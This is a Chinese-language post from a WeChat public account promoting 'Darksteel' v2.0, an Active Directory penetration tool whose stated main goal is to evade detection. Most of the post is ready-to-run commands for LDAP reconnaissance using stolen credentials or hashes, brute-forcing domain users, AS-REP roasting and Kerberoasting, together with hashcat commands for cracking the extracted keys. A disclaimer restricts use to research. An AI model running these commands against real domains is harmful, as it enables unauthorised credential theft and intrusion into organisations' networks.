声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!
工具介绍
此项目以规避检测为主要目的完成,直接对域控进行攻击的利用没有做,因为如果有设备会产生大量的告警,后续可能会添加bypass检测的利用。
可不填写账号密码使用本地账号进行认证查询(-d参数需要填写域名)
darksteel.exe ldap -d dc.domain.com -n domain.com -m computer
____ ______ ____ __ __ ____ ______ ____ ____ __
/ _` / _ / _` / / / _` /__ _/ _` / _` /
/ L L /'/' ,L_/_/ / L_ L_
__ , / , < /___ _L _L _
_ / \ \ \` / L L L L
____/ _ _ _ _ _ _\ `____ _ ____/ ____/ ____/
/___/ /_//_//_// //_//_/ /_____/ /_/ /___/ /___/ /___/
v2.0.0
[*] Domain Computers:
WIN-KQH5FQSIJSH
DESKTOP-AO8D722
DESKTOP-DO7D913
WIN-7UI852PL
EXCHANGESERVER
ldap
当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
kerberos
针对kerberos漏洞进行利用
blast
爆破域用户
computerip
批量查询域内计算机对应的ip
____ ______ ____ __ __ ____ ______ ____ ____ __
_` / _ / _` / / / _` /__ _/ _` / _` /
/ L L /'/' ,L_/_/ / L_ L_
__ , / , < /___ _L _L _
_ / \ \ \` / L L L L
____/ _ _ _ _ _ _\ `____ _ ____/ ____/ ____/
/_//_//_// //_//_/ /_____/ /_/ /___/ /___/ /___/
v2.0.0
自动化域内信息搜集、kerberos利用工具
Usage:
darksteel [command]
Available Commands:
blast 爆破域内用户
completion Generate the autocompletion script for the specified shell
computerip 查询域内计算机的ip地址
help Help about any command
kerberos kerberos利用
ldap ldap查询
Flags:
--dc string 域控地址
--domain string 域名
--help help for darksteel
Use "darksteel [command] --help" for more information about a command.
LDAP
1、当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备。
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
2、当我们想要查找域内某些关键字对应的user或者computer时可以使用关键字查询,来找到哪些是管理员user和管理员computer
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
3、如果想查询的内容工具内没有写到也可以使用ldap语法进行查询
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
Kerberos
1、利用kerberos不需要域认证对用户密钥进行获取,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。
hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt --force
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
3、如果目标将用户设置了spn后,则可以将密钥输出,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。
hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt --force
darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
https://github.com/wjlab/Darksteel
原文始发于微信公众号(Hack分享吧):2.0.1!域内自动化信息收集利用工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论